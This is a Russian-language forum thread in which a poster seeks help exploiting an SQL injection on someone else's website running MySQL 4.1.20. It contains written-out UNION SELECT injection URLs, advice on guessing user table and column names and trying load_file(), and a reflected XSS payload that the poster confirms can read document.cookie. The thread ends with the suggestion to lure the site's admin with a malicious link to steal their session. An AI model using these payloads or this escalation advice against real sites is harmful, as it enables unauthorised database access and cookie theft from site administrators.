Всем доброго(ой) вечера\ночи!

Уважаемые!
Подсабите хорошим словом =)
Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard).

{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9+from+mysql.user+where+id=1/*

пишет...

SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC;

SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение.

Подскажите пожалуйста.

С уважением.

SELECT command denied to user '........'@'localhost'
SELECT запрещен юзеру '........'@'localhost'

т.е. настройки таковы, что юзеру не доступна база "mysql", а только созданные этим юзером базы.
Это свидетельствует о здравом рассудке сисадмина. Пробуй что-то другое.

Да вот именно что попробывал всё что знал, и в итоге НОЛЬ.
Может кто что-то подскажет ???

{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*

а просто так пробовал

{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*

а просто так пробовал

Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....

Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....
Вот и всё, в базу mysql тебя не пустит. Можеш попробовать подоставать что-то ещё с этой базы, может там форум есть, тогда названия таблиц известны......

к таблице MySQL меня не пустили.
Записать файл, а так же прочитать файлы - тоже не дали.
Вроде все способы попробывал.

Не уже то не уязвима?
Может кто сплоиты знает к этой версии? :confused:

Попробуй подобрать названия таблиц с юзерами: user, users, username, uname и т.д. потом надо подбирать колонки.

Пробуй осуществить XSS (как я понял - у тебя не blind инъекция) :
iew&aid=-1+union+select+1,2,<script>alert();</script>,null,5,null,7,8,9+from+mysql.user+where+id=1/*

Load_file()

Пробуй осуществить XSS (как я понял - у тебя не blind инъекция) :
iew&aid=-1+union+select+1,2,<script>alert();</script>,null,5,null,7,8,9+from+mysql.user+where+id=1/*

да работает только зачем знак ; после алерта?
Поставил document.cookie и выдал мне мой кук.
Но что мне это даст - ведь с помощью этого не взять базу. Засылать админу ссылки иль картинки - не вариант (есть на это причины).

']Load_file()

Неа. Тоже не работает.

да работает только зачем знак ; после алерта?
Поставил document.cookie и выдал мне мой кук.
Но что мне это даст - ведь с помощью этого не взять базу. Засылать админу ссылки иль картинки - не вариант (есть на это причины).
Да, как-то не учел про точку с запятой. Ну, если тебя не устраивает впаривание ссылок, другие методы взять базу в такой ситуации вряд ли тебе кто-нибудь посоветует.